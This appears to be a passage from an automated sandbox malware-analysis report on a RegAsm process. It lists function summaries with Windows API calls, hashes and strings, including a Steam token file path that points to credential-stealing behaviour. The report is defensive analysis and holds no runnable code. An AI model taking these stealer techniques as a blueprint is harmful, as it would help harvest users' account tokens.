                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00415560 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00427383,?,00000000,004225D0,000000FF,?,00418244,?), ref: 004155C7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004153E0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Soft\Steam\steam_tokens.txt, xrefs: 004155DF
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrlen$CreateObjectSingleSleepThreadWaitlstrcat
                                                                                                                                                                                                                                                                                                  • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                                                                                                                                  • API String ID: 2356188485-3507145866
                                                                                                                                                                                                                                                                                                  • Opcode ID: 82f7f66776da159feb174cd1c052f2c75f514489b5fd89381fe20bfe032bc715
                                                                                                                                                                                                                                                                                                  • Instruction ID: 72bb85e2ae34570a401298599826632edfc0c26c1556d4927fbe038025474c9d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82f7f66776da159feb174cd1c052f2c75f514489b5fd89381fe20bfe032bc715
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91217171800248EACB10EBE5C946BDDBB78AF19314F50417EE515736D2DB7C2708CAB6
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 004116D0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 35memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,?,00000001,00000004,?,00413C40,00000000,00000000), ref: 004116EC
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AllocLocal
                                                                                                                                                                                                                                                                                                  • String ID: @<A
                                                                                                                                                                                                                                                                                                  • API String ID: 3494564517-4260584491
                                                                                                                                                                                                                                                                                                  • Opcode ID: ea00a148863c1ebc4c14e0b152142d2a107d03e69eab002bf71996523b5e63db
                                                                                                                                                                                                                                                                                                  • Instruction ID: ca1a9253186f1b5ee703eb257632d364ba5c8053fd628161870718111730db74
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea00a148863c1ebc4c14e0b152142d2a107d03e69eab002bf71996523b5e63db
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9EF05C3A3007111783120B9D88405A7F79EFFC6E11704012BDB68CB3A4C931DC4042E0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00407FC0 Relevance: 2.8, APIs: 2, Instructions: 260stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040822B
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040823F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2500673778-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7795965975be68010b164d7d6a4c4c17dd5602c05824522f676f6fbefe93c2e2
                                                                                                                                                                                                                                                                                                  • Instruction ID: ea5c140e8df150c45b94e9dcb21e72039a34b19554562d26b54438b66e46b29d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7795965975be68010b164d7d6a4c4c17dd5602c05824522f676f6fbefe93c2e2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24B17C70801248EACB14EBA4D951BEDBBB9AF19304F54417EE506732D2DB786B0CC765
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00417810 Relevance: 2.6, APIs: 2, Instructions: 141stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00417867
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,01571E40), ref: 00417886
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: wsprintfA.USER32 ref: 00417588
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: FindFirstFileA.KERNEL32(?,?), ref: 0041759F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: StrCmpCA.SHLWAPI(?,004276D4), ref: 004175DC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: StrCmpCA.SHLWAPI(?,004276D8), ref: 004175F6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: wsprintfA.USER32 ref: 0041761B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: StrCmpCA.SHLWAPI(?,0042734E), ref: 0041762A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: wsprintfA.USER32 ref: 00417647
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: PathMatchSpecA.SHLWAPI(?,?), ref: 00417677
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: lstrcat.KERNEL32(?,0156F8D8), ref: 004176A3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: lstrcat.KERNEL32(?,004276F0), ref: 004176B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: lstrcat.KERNEL32(?,?), ref: 004176C3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: lstrcat.KERNEL32(?,004276F4), ref: 004176D5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: lstrcat.KERNEL32(?,?), ref: 004176E9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: wsprintfA.USER32 ref: 00417666
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: FindNextFileA.KERNEL32(000000FF,?), ref: 004177B7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417550: FindClose.KERNEL32(000000FF), ref: 004177C9
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 153043497-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 19d8bb7641ed99d738dae766f0dc988b0d5e61dade8f460a10954d72e843e993
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2e57dd990f11a9539e32d0faed319d5d26a9de71c519438fa1fc2cba58423c01
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 19d8bb7641ed99d738dae766f0dc988b0d5e61dade8f460a10954d72e843e993
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4451C5B5900204EBCB14EBA4DC42EEE7B7AAB4C704F00432EF91557692DB789B548BE5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00406670 Relevance: 2.6, APIs: 2, Instructions: 71memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,00000000,?,?,?,00406B2E,00000000), ref: 004066CF
                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,?,00406B2E,00000000), ref: 00406703
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 05b4c1d6b8d8c16b753068be011d095b66a4696be7e78814b8d4b5191835b582
                                                                                                                                                                                                                                                                                                  • Instruction ID: c00277f812735639d14bf9be3faa546bda705447e3ead095c8c0065c08ee9dfd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05b4c1d6b8d8c16b753068be011d095b66a4696be7e78814b8d4b5191835b582
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC21A2713407009BD734CB79CC81BA7B7EAAB80714F144A2EEA5AD6390D67AA8908658
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                                                  Function 6C806C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C806CCC
                                                                                                                                                                                                                                                                                                  • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C806D11
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(0000000C), ref: 6C806D26
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C806D35
                                                                                                                                                                                                                                                                                                  • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C806D53
                                                                                                                                                                                                                                                                                                  • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C806D73
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C806D80
                                                                                                                                                                                                                                                                                                  • CertGetNameStringW.CRYPT32 ref: 6C806DC0
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000000), ref: 6C806DDC
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C806DEB
                                                                                                                                                                                                                                                                                                  • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C806DFF
                                                                                                                                                                                                                                                                                                  • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C806E10
                                                                                                                                                                                                                                                                                                  • CryptMsgClose.CRYPT32(00000000), ref: 6C806E27
                                                                                                                                                                                                                                                                                                  • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C806E34
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32 ref: 6C806EF9
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000000), ref: 6C806F7D
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C806F8C
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C80709D
                                                                                                                                                                                                                                                                                                  • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C807103
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C807153
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 6C807176
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C807209
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C80723A
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C80726B
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C80729C
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C8072DC
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C80730D
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C8073C2
                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C8073F3
                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C8073FF
                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C807406
                                                                                                                                                                                                                                                                                                  • VerSetConditionMask.NTDLL ref: 6C80740D
                                                                                                                                                                                                                                                                                                  • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C80741A
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(?), ref: 6C80755A
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C807568
                                                                                                                                                                                                                                                                                                  • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C807585
                                                                                                                                                                                                                                                                                                  • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C807598
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C8075AC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82AB89: EnterCriticalSection.KERNEL32(6C87E370,?,?,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284), ref: 6C82AB94
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82AB89: LeaveCriticalSection.KERNEL32(6C87E370,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C82ABD1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                                                                                                                                                                                                                  • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 3256780453-3980470659
                                                                                                                                                                                                                                                                                                  • Opcode ID: 22ad7ec2d696ed7b5345f1aa65482ceef02d92c2a8070a3d6ce59121e83c5dd6
                                                                                                                                                                                                                                                                                                  • Instruction ID: fdcc2b7e822848bd1d7861e1f0d025931e21c760e3aeb2c6196fa9c4bd9c7cef
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22ad7ec2d696ed7b5345f1aa65482ceef02d92c2a8070a3d6ce59121e83c5dd6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0252BA71A003249FEB31DF25CD48BAE77B9EF55708F1049A9E90997640EB706E84CFA1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C8064C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C8064DF
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C8064F2
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C806505
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C806518
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C80652B
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C80671C
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 6C806724
                                                                                                                                                                                                                                                                                                  • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C80672F
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 6C806759
                                                                                                                                                                                                                                                                                                  • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C806764
                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C806A80
                                                                                                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C806ABE
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C806AD3
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C806AE8
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C806AF7
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                                                                                                                                                                                                                  • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 487479824-2878602165
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2749d02ba6f94dccf1db93fd05545f25a136a7724046a449af5ef22b10354ad7
                                                                                                                                                                                                                                                                                                  • Instruction ID: a864e295928d444ea4a0c4d01a5dc763abc6abcbf106edac1fe00cd438ac9755
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2749d02ba6f94dccf1db93fd05545f25a136a7724046a449af5ef22b10354ad7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47F1F470A056299FDB30DF24CE48B9AB7B5AF46318F1446A9DC09A7741E731AEC4CF90
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

